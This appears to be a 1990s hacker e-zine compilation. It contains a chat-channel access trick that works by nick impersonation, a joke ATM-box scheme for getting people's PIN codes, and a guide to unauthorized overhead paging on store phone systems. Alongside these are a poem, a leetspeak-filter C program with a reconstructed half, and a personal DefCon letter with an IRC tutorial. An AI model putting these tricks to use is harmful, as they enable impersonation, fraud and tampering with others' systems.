Macs are easy, but they insulate you from the gory component-level HARDWARE hackery, and it's all the kard swapping, IRQ fiddling, dipswitch setting, chip pulling, and tooth gnashing that make the intel based PC world very cyberpunk (haqr like). Using a mak makes it a hurl of a lot harder to achive deep geekhood, and you're far less likely to build up really neat piles of old interface kardz, motherboards, and obsolete hard drives. (Although maks have thier own tools JUST TO OPEN THEM UP which you could leave around looking like you are doing a open heart surgury.) Also, you never hear of people building macs from the 3 various catalogs and from the dumpster behind Joe's Bait and Chip shop. YOU CAN DO THIS WITH PC'S, and any extra parts around your apartment around your home and give it that hacker feeling.

Novelist Umberto Eco compared the mac operating system to the Catholic church. Belivers (Users) Must approach god (the hardware) through a thick layer of churchy inderection and simplifacation (icons, symbols, point-and-click), while DOS is very Protestant--you're responsible for achieving ON YOUR OWN, damn it, and confess your sins DIRECTLY to GOD, AND NO KISSY FACED ICONS BETWEEN.

-THE END-

-----------------------------------------------------------------------------

ICB hacking

There is a chat program called ICB (Internet Citizens Band). Lots of times there is an invite only channel and I will Explain to you how to get into one without being invited. First you must monitor the channel and wait until someone leaves (signs off) and then change your nick to what thier nick WAS. Enter the channel.

How this works: The ICB server keeps a list of people who are invited into the channel. It keeps their nick, not their address, so if anyone enters the invite only channel then it will think it iz them.

comments? questions? pizza? sex? talk?
nicotine@deeptht.armory.com

<---------------------------------------------------------------------------->

How Tew Hax0r An ATM Macheene
by shadow tao

tew buyld aye tao-box yew will need:

1. a beeg kardbord box. (get one that had a cold-macheene or a sw1shee-woosh-woosh macheene)
2. sum sizzors.
3. a voyce.
4. sum crayons. (prufurablee 486/60 cray-olas.)
5. a red box.
6. a dollor b1ll.

ok!@ get da big box (nota big redboxdumbass!) and kutt slits inda front and draw on it like dis:

 _______________________
/______________________/|
| maytag atm dood!     ||
|      ====   <-------- card sl1tt!!
|free                  ||
|warez!     xxx <------------tape red bocx here!@#
|           xxx        ||
|qw1k       xxx        ||
|kash!                 ||
|      ====   <-------- kash sl1tt!!
|______________________|/

okay! now that you have done this! hide in the box and wait for sukkerrz!!! wen the sukkerz put ther kard in! wate forr the kodez!! if joo donut here da kode! say: "um...please speak the kode into da box..er...atm." but! besure that you say it in a robotvoyce or dey will call da pigz!
once joo gotda kodes, steek the doller out da kash sl1tt adn say: "boopboopboop! macheene errer! pleeze go away!!!!!!" wate for sukkerr to leeve adn run adn useda kodez! runrunrun! da sukkerrz got da gunz! if he dosnot go away adn wonts his kardd bak say: "um. no." if he still won't go away - offer h1m warez! dont put da box in da rode! yu wil be run over! if peepul see yu in da box say yu are da magic atm elf! offer dem warez! <----------------------------------------------------------------------------> .--[An official]----------------------. : .-----. .-----. .--.--. : : : .--' : .--' : : : : !_-:: : `--. : `--. : . : ::-_! :~-:: :: .--' :: .--' :: : ::-~: : ::.: ::.`--. ::.: : : : `--' `-----' `--'--' : `----------------------[Production]---' (pretty phat ascii eh?) Title: Department store PBX overhead paging for the elite Author: Tele Monster (telmnstr) (tm) 1. Intro -------- HAVE YOU EVER BEEN INTO A DEPARTMENT STORE AND GOT TIRED OF HEARING SOME RASPY HOMEGIRL UP FRONT TALKING OVER THE INTERCOM. SECURITY TO BLOCK 12A. WE GOT SOME LOST BRAT NAMED MICHELLE AT COURTESY DESK. SOMEONE TO THE ELECTRONICS DEPARTMENT. BOOOOP. NOW ITS _YOUR_ TURN TO TAKE TO THE INTERCOM AND SPILL YOUR THOUGHTS. THATS RIGHT, TELL THAT OLD WAL*MART GREETER WHAT YOU THINK OF HIM, AND HOW HE WON'T GREET TEENAGERS BECAUSE HE THINKS THEY ARE ALL SPOILED SCUM. TELL THAT BITCH THAT WON'T HELP YOU IN THE ELECTRONICS DEPARTMENT THAT SHE IS UNOFFICIALLY FIRED. LAY OFF THE ENTIRE STAFF. USE YOUR IMAGINATION. 2. How ------ First you must go into your store of choice. After inside scope out the camera bubbles and how many cops are there. This generally doesn't matter as they don't care who says what over the intercom. There isn't a law that says you can't talk on the phones provided in the isles. (There is however a law that says no shouting fire in a theatre, keep that in mind. This also applies to no shouting fire in a wall*mart. Opps. This is too new school.) NOW YOU MUST FIND THE TELEPHONES. 
THESE ARE GENERALLY ON A POLE THAT SUPPORTS THE ROOF. GOOD THING THOSE POLES ARE THERE, EH? ANYWAYS. IN MANY STORES THEY MARK THE POLE AT THE TOP SO YOU CAN SEE IT ALL OVER. THE ONES WITH FIRE EXTINGUISHERS ARE NORMALLY MARKED WITH A RED ARROW OR RED LINE AROUND THE TOP. WALL*MART MARKS THEIR TELEPHONE POLES (HAHA) WITH A BLUE BAND AROUND THE TOP. THE OTHER TWO STORES (REMEMBER THEY ARE GENERALLY REGIONAL SO NO USE IN TALKING ABOUT THOSE SPECIFICALLY HERE) FOLLOW THE SAME WAY EXCEPT IT IS A BLUE ARROW POINTING DOWNWARD WITH "PHONE" WRITTEN ON IT. W0RD. (lets take it to the really really old school) NOW YOU MUST DETER-MINE THE TYPE OF TELEPHONE SYSTEM USED. SOME POPULAR ONES ARE NORTHERN TELECOM MERIDIAN SYSTEMS AS WELL AS COMDIAL. AT&T SPIRIT AND MERLIN SYSTEMS MAY BE USED, BUT THEY ARE GENERALLY AVOIDED BECAUSE OF AT&T'S GREED. THEY ARE JUST TOO EXPENSIVE. ROLM/SIEMENS AND TOSHIBA ARE SOME MORE POPULAR BRANDS. ONCE AGAIN ROLM IS GENERALLY FOR BIG PLACES, NOT BOBOSQUATNOT STORES. ANYWAYS ONCE YOU SCOPE OUT YOUR TELEPHONE YOU MUST THEN FIGURE OUT TO GET ON THE OVERHEAD. SOME STORES ACTUALLY HAVE WHAT LOOKS LIKE JUST A NORMAL TELEPHONE HOOKED TO THE KSU. THIS REALLY SUCKS WHEN THIS HAPPENS. Hopefully there will be and extension list next to, under or on the handset. Look for PAGE, OVERHEAD or anything close (PGE, OVRHEAD). Intercom is generally for station to station communication. They might just plug the audio amplifier into one of the extensions, it depends. Generally though, there will be this BIG PHAT button that says... PAGE. On the comdial systems, you will notice that there might be a light under the button or over the button that comes on when someone talks over the overhead. Look on the other phones to see if an arrow appears on the LCD screen or led lights when they talk. This can easily narrow it down. If you are on a normal bobo handset just dial something and when you get someone ask, "What is the extension for the overhead page." "69 why who is this?" 
"thank you " .. Pick up romp on the 69 and kwakbam. Jibbie jibbie jibbie jibbie. (I lost the old school touch) I forgot where I was... hmmm. Anyways. If it is the Meridian (Awwyea) system, and the key isn't labeled, keep hiting all of the buttons until you hear yourself grunting twelve times as loud. Generally Wall*Mart phones have somewhat of a low audio level over the page. The Meridian at Hills department store is really loud, as they use the outside paging horns as the speakers. The louder the more funny, but you gotta do it with attitude or else it is easy to start lauging. It sounds pretty pathedic to the normals in the store when they hear, "Hi you hahahah bahahahahah boop" One wall*mart near us converted over to the old style telephones (No buttons, just a normal 12 key keypad.. still on a pbx though) because of problems of unauthorized overhead paging (that just sounds funny). If you are REALLY BALLSY and these phones used a standard 2 line hybrid interface into the pbx, you could go open up a cordless phone, plug it in for 20 minutes while you hang out and jam Just Like Heaven on the toy pianos as the NiCad recharges. Then plug the cordless in where the phone was (check first to make shure it isnt a RJ-45 connector. If all else fails, the cordless will fry). If all does go well.. muhahah wireless mobile unauthorized overhead paging in a bobo squatnot store. (and hey, you didn't STEAL the phone cause its still in the store). 3. What to say -------------- This is the hardest part. What to say. If your a little twelve year old you might just burp in the thing or something. But if your a little older you can only display your wrath of eliteness thru what you say and how you say it. "Yo wally world shoppers, You are the grand prize Winna!@# For the next 10 minutes everything in the store you can fit in two shopping carts is yours free. Limit one computer and sofa per customer. GO!" (Bam. Every wallmart shopper kicks into supermarket sweep mode.) 
** This might count as yelling Fire in a Wall*Mart. So contact your nearest lawyer for some consultation first. :) If you care.
*** This hasn't been tested yet.
**** If you do it, tell me how it goes.
***** The host of supermarket sweep is sum guy with a sweater, Thanks to h0trod for this info.

One case we did do in which we were caught was at a going out of sale at a biglots store. They sell excess inventory, and have no sense of humor. The conversation went like this:

over pa> "boop. Hi. MOM? MOM? ARE YOU THERE? No no I can't hear you"
Guy walks up from behind. Taps thy on the shoulders.
over pa> "Huh?"
Guy "See that exit door right there?"
over pa> "yea"
guy "I want to see you on the other side"
over pa> "Oh. so leave?"
guy nods yes.

That is the WORST thing that has ever happened when pa'ing. It's not illegal to do stupid stuff like that.

Another one in a wally whirrled (wall*mart)

"Hi. I'd like to take this moment to mention that you all suck"
>"Security to sector 120"
"Cancel that security, go to sector Z. There isn't a problem"

Other lines that have been said:

"Aww yea 240 dolla's worth of puddin. At a wally world sale"
"Despite all my rage I still end up on the hills overhead page"

If you have wussy friends, they tend to run when you start talking. It is most hilarious if there are non-employee shoppers all in the aisle when you pick up and scream. They just give you that look and some of them smile and laugh and stuff.

4. Quick reference to found pa/pbx systems
------------------------------------------

.---------------.----------------------.-------------------------------.
: Store         : PBX Brand            : To initiate page              :
`---------------'----------------------'-------------------------------'
  Wall*Mart       Comdial                PAGE button
  Macys           Unknown                ??
  Sams            Comdial                PAGE button
  Sears           Unknown                ??
  HQ Warehouse    Toshiba                ??
  FAO Schwarz     Unknown                ??
  Lowes           Meridian               ??
  Caldors         Unknown                ??
  Hills           Meridian               PAGE button
  Taco Bell       Unknown                ??
  K-mart          Unknown (standard)     66
  BJ's            Unknown                ??
* This can all change depending on what store and who installed their telecom system. They don't have to contract it out on a national basis.

5. Other goofy ideas
--------------------

* Take an old walkman and add an rj-14 or whatever the hell the handset connector is. Pin it out so that the audio from the walkman is piped into the mic leads of the phone. Carry it in there and plug it in in place of the handset. Take the handset and chuck it behind the maxi's, pop page, press play and adjust the audio so it's clear.

* If you notice a nasty HUMMM noise on the pa, go to the customer service desk after you say all of that mess, and notify them that they have an audio isolation problem. Tell them they should put an isolation transformer on the ac line or between the amp and pbx system. Tell them there may be some signal loss using a transformer on the audio line but with the shitty quality it doesn't matter anyways. Generally the hum is at 60 hertz (same as AC line power).

Greetz:CasretCgRedragonLoqDhateBl0keIppy      bah. im tired of this
UhermW1ldMrhydeMisfitMr804MotherU4eaD_D       article. so this is the
ErikbEmmanuelYomammaTheeJokerJulietOphie      e n d.
LANshark][cemanGentry|al|t3AlbatrossMooks
GlennntsSet0nchmawdteklordVainrst0bias
sn0crashsnoNinjaXgirlL0raX,Y,Z,Aborted
and CYN0BYTE!@#

<---------------------------------------------------------------------------->

The Tales of oof.- (c) 1995 t3 Incorporated.

Once upon a shining tooth,
I witnessed thee his name was oof.
He spoke to me in lore of old,
about a land covered with mold.

It spawned small creatures, all shapes and sizes,
some of them looked like cereal surprises.

They spoke a tongue called ancient foo,
reveled across the land,
and when the words were spoken true,
you knew who was in command.

These creatures came from miles around,
to hear the minister speak,
sometimes a few of the souls would ask
"do you know how to phreak?"
Then oof would roar with a thunderous laugh,
and wave his magic wand,
a flash of lightning and a puff of smoke,
and suddenly the creature was gone.

The creatures came to understand,
that sir oof was their own true god,
and when he heard them chanting so,
he bowed his head to nod.

And so this tale winds to an end,
with the master pleased with me,
I feel a sense of warmness when,
oof speaks to me.

<---------------------------------------------------------------------------->

The Elite Speak Filter
by SnoCrash

/* u4ea_filter 1.06 -- SnoCrash[FEH]                             */
/* Just start this up and paste lines of baffling u4ea-speak in. */
/* Nearly recognizable English text will pop out!                */
/* Since u4ea-speak changes nearly every day, please send your   */
/* additions to: snocrash@hackerz.org or snoninja@pussy.org      */
/* compiles with: gcc -O2 -Wall -o u4ea_filter -s u4ea_filter.c  */
/* Usage example:                                                */
/*       echo 'y00 4r3 cl00l3$$, sn0d0rk' | u4ea_filter          */
/* (single quotes, so the shell does not expand $$)              */
/* would produce:                                                */
/*       you are clueless snodork                                */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define usage() { fprintf(stderr, "Usage: %s [infile] [outfile]\n", argv[0]); exit(1); }

FILE *out;

/* Print the plain-English form of one word. Matching is by prefix */
/* (strncmp), so whatever follows the matched prefix is dropped.   */
void filter_word(const char *word)
{
    /* Some of u4ea's favorite words. */
    if(!strncmp(word, "klooless", 8)) fprintf(out, "clueless");
    else if(!strncmp(word, "clooless", 8)) fprintf(out, "clueless");
    else if(!strncmp(word, "layme", 5)) fprintf(out, "lame");
    else if(!strncmp(word, "joo", 3)) fprintf(out, "you");
    else if(!strncmp(word, "o-day", 5)) fprintf(out, "0-day");
    else if(!strncmp(word, "fook", 4)) fprintf(out, "fuck");
    else if(!strncmp(word, "yoo", 3)) fprintf(out, "you");
    else if(!strncmp(word, "uaea", 4)) fprintf(out, "u4ea");
    else if(!strncmp(word, "kodez", 5)) fprintf(out, "codes");
    else if(!strncmp(word, "lozer", 5)) fprintf(out, "loser");
    /* "uzer" has to be tested before its prefix "uze", or it can never match. */
    else if(!strncmp(word, "uzer", 4)) fprintf(out, "user");
    else if(!strncmp(word, "uze", 3)) fprintf(out, "use");
    else if(!strncmp(word, "gno", 3)) fprintf(out, "no");
    else if(!strncmp(word, "dood", 4)) fprintf(out, "dude");
    else if(!strncmp(word, "donut", 5)) fprintf(out, "don't");
    else if(!strncmp(word, "m4h", 3)) fprintf(out, "my");
    else if(!strncmp(word, "iz", 2)) fprintf(out, "is");
    else if(!strncmp(word, "stewpid", 7)) fprintf(out, "stupid");
    else if(!strncmp(word, "reaiiy", 6)) fprintf(out, "really");
    else if(!strncmp(word, "klueless", 8)) fprintf(out, "clueless");
    else if(!strncmp(word, "kan", 3)) fprintf(out, "can");
    else if(!strncmp(word, "wewp", 4)) fprintf(out, "woop");
    else if(!strncmp(word, "telko", 5)) fprintf(out, "telco");
    else if(!strncmp(word, "eye", 3)) fprintf(out, "i");
    else if(!strncmp(word, "chooze", 6)) fprintf(out, "choose");
    else if(!strncmp(word, "eleet", 5)) fprintf(out, "elite");
    else if(!strncmp(word, "muzt", 4)) fprintf(out, "must");
    else if(!strncmp(word, "buzy", 4)) fprintf(out, "busy");
    else if(!strncmp(word, "ewe", 3)) fprintf(out, "you");
    else if(!strncmp(word, "tew", 3)) fprintf(out, "too");
    else if(!strncmp(word, "muh", 3)) fprintf(out, "my");
    else if(!strncmp(word, "pheel", 5)) fprintf(out, "feel");
    else if(!strncmp(word, "oph", 3)) fprintf(out, "of");
    else if(!strncmp(word, "giph", 4)) fprintf(out, "give");
    else if(!strncmp(word, "sum", 3)) fprintf(out, "some");
    else if(!strncmp(word, "timez", 5)) fprintf(out, "times");
    else if(!strncmp(word, "gewd", 4)) fprintf(out, "good");
    else if(!strncmp(word, "ur", 2)) fprintf(out, "you're");
    else if(!strncmp(word, "fuqed", 5)) fprintf(out, "fucked");
    else if(!strncmp(word, "yer", 3)) fprintf(out, "your");
    else if(!strncmp(word, "rox", 3)) fprintf(out, "rock");
    else if(!strncmp(word, "yew", 3)) fprintf(out, "you");
    else fprintf(out, "%s", word);
}

int main(int argc, char **argv)
{
    FILE *in;
    char buf[100];
    register char *t;
    register int i;

    if(argc == 3){
        if((in = fopen(argv[1], "r")) == NULL) usage();
        if((out = fopen(argv[2], "w")) == NULL) usage();
    }else if(argc == 2){
        out = stdout;
        if((in = fopen(argv[1], "r")) == NULL) usage();
    }else{
        in = stdin;
        out = stdout;
    }

    while((fgets(buf, 99, in))){
        /* The listing breaks off at "for(i=0;i". Everything from here to  */
        /* the end of main() is a reconstruction (an assumption) based on  */
        /* the usage example above, so it only undoes the substitutions    */
        /* that example shows: 0, 3, 4 and $.                              */
        for(i=0;buf[i] != '\0';i++){
            switch(buf[i]){
                case '0': buf[i] = 'o'; break;
                case '3': buf[i] = 'e'; break;
                case '4': buf[i] = 'a'; break;
                case '$': buf[i] = 's'; break;
            }
        }
        /* Split on whitespace and punctuation; hyphens and apostrophes */
        /* stay inside words so that "o-day" can still be matched.      */
        i = 0;
        for(t = strtok(buf, " \t\r\n,.;:!?\"()"); t != NULL;
            t = strtok(NULL, " \t\r\n,.;:!?\"()")){
            if(i++) fputc(' ', out);
            filter_word(t);
        }
        fputc('\n', out);
    }
    return 0;
}

<---------------------------------------------------------------------------->

A Lamer's Review of DefCon
by Zeed

You don't know how happy I was when I saw you come into #devo. I couldn't believe my eyes. I had been trying to find out your email address from just about everybody. Well, now I know it ;) How was your summer? I remember you said it was pretty cool.

My summer was my trip to CA, AZ, NV. For the first 2 weeks, I stayed in California. I went to the beach, went to trendy coffee houses, played pool in smoke infested game parlors, visited old friends, went to malls, cruised around, talked to people on the phone, spent money, etc.. It was fun, I was with my friend Brian most of the time. (You spoke to him on the phone) I didn't meet Jill or Tiffany. Each for different reasons. Jill didn't come to CA until like 2 days before I was to leave CA, and Tiffany was 9 hours away and every time I tried to call her she was never home. I think you were the only online friend I called the whole time I was there, well Jill called me once. Anyways, I am so glad I got to talk to you.

When I was in CA, I went and saw some of the old houses I used to live in. We drove by, my old friend, Mile's house.
I don't know if it was good timing but he was outside and we stopped and talked to him. It had been ages since I had talked to him. My friend Brian is off in AZ at a technical school called, "High-tech institute". It's a 1 year degree in electronics I think. Then he is going to Australia for a year. His dad is Australian. He is turning into a party animal, hehe. Those damn roommates of his ;)

Hmm, let's see.... Well here is the defcon summary.

Ryan, Brian and I arrived in Las Vegas around 5:00pm Thursday afternoon.. I got our hotel room and got all our bags in the room. At like 8pm we drove to the Airport to pick up Melanie, Jake and maybe Brett (if he showed). Well first we went to Melanie's gate and soon we met up with Jake. We both recognized each other cause we had each others pics. Then Melanie's flight came in. She met us all and then we were off to the Hotel.

The first night we just talked a lot in my room, then we all went to eat at some restaurant at the Excalibur. We talked a lot there. Jake was really funny, he is outgoing and had all kinds of funny stories. Btw, Brian, Ryan and I are all 18. Jake is 21, and Melanie was 23.

Well we came back to the hotel we went for the Casino. Jake got some beer and he got one for Ryan. Melanie went off to play the Quarter slots, and Jake went to Drink and play video poker. Brian and Ryan were being told to leave the casino cause they weren't 21, so I gave Brian a key and I went to where Melanie was playing the slots. I played them too, for a while. Personally, I don't see how anybody could get addicted to it. hehe, maybe that's cause I have a slot machine in my room ;) Melanie was doing pretty well actually. We just played and played, until one of the old ladies asked if I was 18, so I had to leave. We all went to a couple more casinos.. Melanie followed me back to the hotel room. We like watched TV. We all went to sleep soon after that. Melanie had her own bed, and Jake, Brian and Ryan insisted that I take the other bed.
Though I told them they could have it. It felt good in a way, I had been sleeping on the floor the whole 2 weeks in CA.

Well the next morning we woke up (Isn't that a surprise) =) We all got registered at the Defcon exhibit room. I went and hung around Defcon, because I started noticing a bunch of familiar faces. I talk for a long while. Melanie is down with me soon and she spots Zoop. Zoop was surprised to see me there, he is only like 16. Zoop told me that he had been looking for Emily and Jason. Zoop told me that Emily was wearing a t-shirt with a happy face on it.

Later I was sitting at a table in the casino with Melanie, Zoop and Brian, and to my total surprise some guy introduced himself as "Andy Conov" to Mel. I yelled out "Andy!!" "This is Zeed" (You see, Andy and I are always online at night trading hacker stuff, he is a good friend) He didn't believe it was me at first. He says: "I was expecting Zeed to be a short little guy, hehe" I talked to Andy a long time, and you know. Andy was actually pretty much the way I imagined him.

Anyways, Mel, Brian, Ryan and I all went to the Hard Rock Cafe to eat dinner. Right before we left to walk to the parking lot, I spotted a tall nice looking girl wearing a happy face t-shirt. I recognized her face from a gif too. I stopped her dead in her tracks and said: "Emily?!?" "This is Zeed!" I noticed this tall short haired guy in the background behind Emily staying his distance from me. I said "Is that Jason?" She said "yes". He like was trying to not get near me.. (We didn't always get along, hehehe, I think he thought I might start something with him) Well I gave her my room number and she gave me hers. I told her that we were off to eat dinner and that we will be seeing each other soon.

Well, we ate at the Hard Rock Cafe. I had a veggie burger ;) Then we got back to the hotel room. Brian, Ryan and Melanie kind of were ready for bed. I wasn't. So I went to hang out at the Defcon room, there I met up with Zoop again.
We watched Hacker Jeopardy, and Jake was a contestant. They were like handing out beers and stuff, it was a really lax environment. People were just having pure fun. In that room though were all kinds of neat people.

Winn Schwartau, he is the Author of "Information Warfare". He was the host of Hacker Jeopardy.
The producer of the movies "War Games" and "Sneakers"
Erik Bloodaxe, famous hacker from the Legion of Doom
Dan Farmer, the Author of SATAN
and others...

During hacker jeopardy, I won a free t-shirt cause I was the only person who could answer one of the questions. It was related to video games so =P

Well Hacker Jeopardy started winding down and beers were everywhere. Right before we left, Zoop grabbed one for himself. Zoop and I explored around the casino a while. Andy found us again, and we all hung out in the lounge where they were playing music. Andy and his friend from Montana were a little tweeked though ;) His friend tried to climb one of the fake palm trees in the lounge, hehe. They were both acting really silly. We talked some more. Then Andy and his friend took off to go back to their hotel, Circus Circus. Zoop and I went to the Excalibur to eat. There, Zoop talked about some AOL secrets and I talked about some internet ones. I ordered a Chicken Quesadilla =9 It was too spicy though, hehe

Well, I finally got back to the hotel room at around 4am. Everybody was sound asleep, I was afraid I might step on somebody, hehe. A room for 2, with 5 people sleeping in it.

Well the next morning we hung out at the Defcon room again, and I met up with all my friends from the Los Angeles 2600 meetings, it was cool. While I was schmoozing around Defcon with my friends, Melanie won about $400 on the quarter slot machines. It was this day that I noticed that maybe she wasn't having so much fun at defcon.

(it's a long story, but in the end it turns out that she wanted to do more things with just me)
(She didn't talk much, or say much.
So I didn't know really she wanted to do)
(Though I did arrange a trip to a Dolphin show at the Mirage. )
(I think it was just a bunch of weird personal feelings about each other)
(I had kind of brought things down to a "friends" level before we met at defcon)
(I did give her a big hug though, and a little silver dolphin necklace, cause she loves dolphins)
(It's a long story, I don't know if you care to hear it or whatever.)
(I guess I had fallen in love with Melanie without even meeting her or even knowing what she looked like)
(About 2 weeks before defcon, I kind of freaked out and slowed things down majorly)
(I got so depressed over the whole thing, cause I knew I was making mel hurt inside so much)
(She really wanted me to be her "close" friend, we had even made plans to be roommates in OK)
(It was so hard to watch her feelings get hurt and for her to be sad, the worst feeling of it was that I was causing all this)
(The reason I mention all this now and here, is because this all had a major impact on what went on during the days in vegas.)
(It's still a painful thing for me, and something where I made lots of stupid decisions)
(It's my fault, I am 18, never had a girl friend, and all this was just new to me)
(btw, please don't talk about this to anybody)
(Maybe you understand? :)

Well where was I.... Oh yeah, well I met up with Andy and Zoop again. We all talked, and had lots of fun. My friend Ryan from San Jose even bumped into one of his old friends.

I went into the speaking room to record the speakers. Well, the first thing I hear is: "John! come here." I turn around and it is Emily, sitting next to her friend Rudy (He was sort of her chaperone). I sat down next to Emily for a while, oddly enough I don't remember saying much to her. Then she left a while later. I met up with Mel and Brian in this room while I recorded the speakers. I saw Emily come in with Jason and they sat down somewhere else.

all of a sudden.. "FED!!!"
(Somebody had spotted a fed) So Dark Tangent grabs the microphone and begins to interrogate the fed, hehe. So the guy whips out his Badge and waves it around showing it to everybody. He gives his little resume type thing to Dark Tangent, and it turns out this guy is a US Customs Agent.

Some of the speakers included:
an ex-CIA case officer.
ex-FBI director of computer division.
Computer security specialist.
There was even a little bit on women hackers. (They like profiled some women from IRC)
and more neat people ;)

Well then things wound down... Emily, Jason, and their friend Rudy (not akira) came up to my room. It was a delicate situation, I knew that Melanie didn't really think all too highly of Emily. Also, Melanie even admitted to me that she is jealous of girls I talk to (This was on aol she told me this once). So I knew it might be a weird situation. But, Emily really wanted to meet Melanie. Well Emily was really friendly with Melanie, and I thought it worked out ok. Though mel didn't say much. This gave me time to take pictures of Emily, hehe ;) We all talked for a while.. Then they had to leave, and mel and I went to play slots. She won more money, hehe, but then they kicked me out of the casino.

I went with Melanie to our room. She started talking to me about if I was going to visit her in Nov. out in Oklahoma. I was explaining to her that my parents might be moving again, and that I have no idea and that I can be certain that I will be able to do anything. Well, in the middle of our little intimate conversation, Brian comes back to the hotel room. Brian and Ryan are telling me all these stories about seeing Elvis walking down the street. I could tell Melanie wanted them to leave.. Anyways, they left, but then Andy came knocking on the door a couple seconds later. I started talking to Andy and Melanie pretty much bolted for the door not saying where she was going. This at the time had me thinking that Melanie really disliked me or something.
(I later found out, that she left cause she was going to break out in tears =\ )
(She thought I was rejecting her or something, it's so complicated though, I can't explain it all here)
(I am still somewhat confused by it all)

Well at this time though, I thought she wanted no part of me. So I went off with Andy back to the convention. There I met up with Brian and Ryan and we watched hacker jeopardy. It was a blast, they were giving away all kinds of free stuff, and of course.. beers =) Ryan took me to the Luxor and showed me their giant Sega Arcade. Then I met up with Brian, and Ryan went back to the room to sleep. I met up with a friend that I know from the New York 2600 meetings, Sid (Sid Vicious).

Well around this time Jake came up to me and asked me if I wanted to go with him to this huge bachelorette party in the hotel somewhere. hehehe, I didn't exactly give him a yes or no answer ;) I said "Umm, let me find Brian" By the time I found Brian, Jake was gone. Don't I just have all the luck? =)

Well Brian, Sid and I went around, checked out the hot tubs, hehe, Naughty hackers were in the hot tubs. So then we went to the food court and we got some food. Then we played a few slot machines.. All this time we were trying to find something to do, or at least find Jake. Well Sid split up from us, and Brian and I just went and had something to eat and drink again. We talked and majorly goofed around. I was so tired and hungry, I must have looked like a zombie. I was like wired, my sentences hardly made any sense, and Brian and I talked like 15 minutes straight on some formula for Artificial intelligence on a computer. We were wacked.

Well Brian and I went back to the hotel room, and we both agreed that we would both take Melanie to the Airport. We woke up, and Melanie was like all packed and ready to go. So I got ready, and the 3 of us went to the Jeep and drove to the Airport. Melanie hardly said a word. Well we got to her gate and everything, I put her bag beside her.
I said: "Well, I hope you have had a fun time here Melanie, I know I did..." She just said: "Yeah, it was fine." I didn't really know what to do, so I said goodbye and Brian and I left back for the hotel.

(I found out later that she wasn't really mad at me, just upset that I didn't do more with just her.)
(I really wish she conveyed her feelings better though, I mean.. I am shy, but even I make suggestions, especially if this person is your best friend (As melanie says I am to her))
(Melanie told me later that she cried on the plane trip back)
(I feel sooo bad :( , what could I do?, it was like the toughest situation I had ever been in)

Well. We wrapped up the day, I met Andy at the last minute and gave him his stuff he left in my room. I said goodbye to all my friends at Defcon... And we headed back to Arizona.....

I am really sorry Mazzie if I really ruined this whole thing with talking to you about Melanie. It's just been in my mind a lot, and well I guess a lot of people probably wondered about Mel and I. We were like the center of a bunch of stupid rumors. I have many mixed feelings about Melanie right now. I think she went a little too far, but I guess it is my fault for getting her so involved with me. Melanie is my friend, and I had been talking to her a lot, trying to make her feel better and be her friend up til a week ago. (Now there is a huge new development with Melanie that doesn't involve me.) I like her a lot as a friend, but I know now that she is not the girlfriend I want. I am really confused right now, and not sure where my life is leading. I really don't want to burden you with my crazy life problems though. I am just happy that I have somebody like you to talk to. You don't know how much I appreciate having friends like you.

Well anyways.. enough of that stuff.. Here is some other info. Do you have a www browser like Netscape? or something? I have my WWW page set up, it's still in development though.
Check it out :) Umm, I would love to put your picture on my web page, but I am not going to do it without your permission. If you don't want to, I understand. I just made a little section for my friends' picture, soon that section will have my new picture on it too.

Well, how is Mazzie the IRC queen coming around? Know all the commands yet? hehe

Here are some commands you could use:

/join #devo              (Join devo channel)
/mode #devo +o Zeed      (if you have +o (operator powers) you can give them to others)
/load textbox.irc        (If you still have textbox.irc, it's a neat script, you can go into multiple channels at once)

you could do:

/join #devo
/join #pain
/join #hack

And you would be in all three channels.. Though when you typed it would end up in #hack, because that's the latest room you switched to. To switch between rooms (When you have textbox loaded) just type /join #devo or whatever. Now you would be talking to #devo. But you did not leave those other channels. To leave a channel do this

/leave #devo

If you see somebody's nick and you want to know a little more about them, type:

/whois zeed

or whatever nick. (note their domain name, like Orange@nether.net)

You can execute unix commands from IRC..... use the exec command

/exec

since finger is a unix command, you could do this. Finger shows you info about me and my system. Not all people have finger info though. If you want any info for when people finger you, edit a file in your unix directory called .plan. you could put whatever you want in it, that file is shown to people who finger you.

if you want to see who is in a particular channel do this

/who #devo

Each channel can be programmed with different modes. You might see something like this:

Zeed has changed the mode to #devo to +i

Well this means I made the channel invite only, meaning that I have to use the /invite command to let them in.

here are some more modes:

+t  This controls who can set the topic in the channel. if it is +t then only +o people can set it.
+s  This makes your channel a secret channel.
+n  This makes it so some people can't write messages to the entire channel.
+m  This makes the channel mediated, where pretty much only people with +o can talk in the channel.
+l  L sets a limit on the number of people who can be in a channel.

you set the mode by doing this for example.

/mode #devo +s

if you want to take a mode off, just do this:

/mode #devo -s

To change the topic in the channel you can do this:

/topic #devo Mazzie is the greatest..

(This makes the topic = Mazzie is the greatest..) =P

ok, one problem with IRC though is that it has what we call "lag". Sometimes it's less than a second. other times it's a lot longer. When you use IRC you are hooked up to an irc server. irc servers are what get lagged.. What you want to do is avoid the lagged servers and go on the fast ones. If your server slows down while you are on it you want to change servers. one way to see how big the lag is by "pinging" somebody. if you did:

/ping zeed

and it responded with: 3 seconds. Then we are doing ok. If you never get a ping response, or if it ends up to be like 200 seconds, then you have trouble ;) A ping is like an echo bouncing off something.

Anyways, to change servers you use the /server command

/server irc.escape.com

would work. There is usually a little delay between switching servers. Here are some fast servers for irc.

irc.escape.com
sgi.texas.net
irc.texas.net
irc-2.mit.edu
irc.eskimo.com

Hmm, what else..... oh, to send private messages to people on IRC. you use the /msg command. like I would do this

/msg mazzie Hey cutie!

Private messages look a little different than channel messages. When you are using textbox, private messages will beep too.

Thank you for attending Jean's small course of IRC 101. =)

wow, I have been writing this for like 3 hours.. hehehehehe oh well. Say "hi" to all your roomies for me :) and I hope you saved me a piece of pizza, because I am going to meet you one day >=) hopefully at least =P Well, I am going to get duplicates of this film from defcon, and i'll send you all kinds of neato stuff :) I hope college isn't going to be too hard for you =\ I know you will do well though. You are very smart :)

See you soon,

{{{{{{{{{{{{{{{{{{{{{ Tabitha }}}}}}}}}}}}}}}}}}}}}

Happy birthday!!!

Love,
Jean-Christophe (isn't French just spiffy?) =)

PS: As you know I have changed my phone number some time ago, did I give you the new one?

{{{{{{{{{{{ Mazzie }}}}}}}}}}}}}

Sorry if I rambled on, or made no sense whatsoever ;) It's 8:00 am here, and I had been working on my web page all night, but I just had to write you!

------------------------------------------------------------------------------

A Confession of Stupidity
by Zeed

